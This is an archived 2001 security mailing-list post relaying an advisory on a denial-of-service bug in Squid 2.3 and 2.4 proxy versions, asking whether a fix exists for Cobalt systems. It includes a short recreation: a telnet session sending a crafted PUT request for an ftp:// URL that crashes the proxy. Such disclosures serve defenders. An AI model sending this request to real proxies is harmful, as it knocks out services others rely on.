[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[cobalt-security] Squid Mkdir-only PUT Requests Denial of Service Attack
- Subject: [cobalt-security] Squid Mkdir-only PUT Requests Denial of Service Attack
- From: deepquest---Code511 <adf@xxxxxxxxxxx>
- Date: Tue, 25 Sep 2001 19:15:23 +0200
- List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>
http://www.securiteam.com/unixfocus/5AP0S0U5FI.html
http://www.securityfocus.com/cgi-bin/vulns-item.pl?section=info&id=3354
Vulnerable systems:
Squid version 2.4STABLE2
Squid version 2.4STABLE1
Squid version 2.3STABLE4
(All versions of SQUID are assumed to be vulnerable)
Recreation:
$ telnet proxy:3128
PUT ftp://whatever:whatever@xxxxxxxxxxxxxxx/ HTTP/1.1
Content-type: application/octet-stream
Content-length: 0
Pragma: no-cache
any update for colbat?
Alexandre Da Fonseca aka Deepquest
Chief of Technology Officer
"Ubi solitudinem faciunt, pacem appelant"
-------------------------------------------------------------
Code511 work:+33-14088-9595
http://www.code511.com cell:+33-66442-1595
PGP DH/DSS http://www.code511.com/pgp fax :+33-14722-7278
-------------------------------------------------------------